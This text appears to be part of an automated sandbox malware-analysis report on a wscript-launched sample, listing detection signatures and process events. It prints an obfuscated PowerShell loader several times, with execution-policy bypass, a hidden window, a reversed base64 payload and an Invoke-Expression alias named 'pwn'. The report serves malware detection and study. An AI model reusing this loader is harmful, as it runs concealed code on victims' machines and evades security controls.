        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;@{# Script module or binary module file associated with this manifest.Mo
        Obfuscated command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;Jump to behavior
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C40BED push ds; iretd 2_2_00007FF886C40C12
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C402FD push ds; iretd 2_2_00007FF886C403E2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C46B21 push ebx; retf 000Ch2_2_00007FF886C46B6A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C40C13 push ds; iretd 2_2_00007FF886C40C12
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C479C8 push E85B7C18h; ret 2_2_00007FF886C479F9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886D17AD0 push ebp; iretd 2_2_00007FF886D17AD2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886D18068 push eax; iretd 2_2_00007FF886D1806A
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3310Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6506Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -11990383647911201s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000003.1357530830.0000018F5FA70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b})
        Source: powershell.exe, 00000002.00000002.2038799244.000002256A94E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oqf7ksewjhzkwyj2g2cljnzlj3lzvwdsfmdvkgch9ccvh2cucxzpz3zvxmyv8iozbhd0h2joegdhrgzh9gbwvnlrpwdksjnxacclvgbz1cdyfgdztdduvwasnmyldnl0vmbgq3ylpmyv1ydl5wprpwdksdmxacclvgbz1cdyfgdzttf7kybkpmykgyclrxecrxzh5comrxv6otxn5wak92yuvml0hxz05sblr3c5n3w9khcyrgjd11wlrxeit1on5wayr3ctqxdpxnbihgj9sybkpmyksjcrpgjggvrj1jbihgj7umbpx0dl5ko60fduvwbu9mcpznbf5sblr3c5n1wrkccprckzv2czvmckrwq0n3birxzhpjodnnbe5cdl5kltvgdzl3ub1zkvrmairyon0tpn0zkvrmairyop1wyvh2d98gzqjgj7v2csvwf7i3aqrciyvus9khcyrgjg0vxbvgd5j2w7lyj05wz052bj1cdld2jgg2y0fwbtaicrpgjoywa7ksbszgjocmbpjhdtrxzn5comrxd6otxn5wak92yuvml0hxz05sblr3c5n3w9i3aqryepedi0dwlgggdn5wzm5sbszgjoywa7kyyyrykn8inonxzyzwzy9im3ydn2ktn1uzn5utm3cdoxcjn48yclvhbhz3lpbxyva3bonnl3vwa2d2bsj2lvozcwrhdodckhrxykrwyvxmb39gzuswaprsptxmzkszj0hhduccirask99fjdjxyon2wgshi0nwzqj2btg2yhvmcvzgi8bsk1edi4fwbtasng4wat1cit9gzufmctqxznbck05wdvnwlg02bk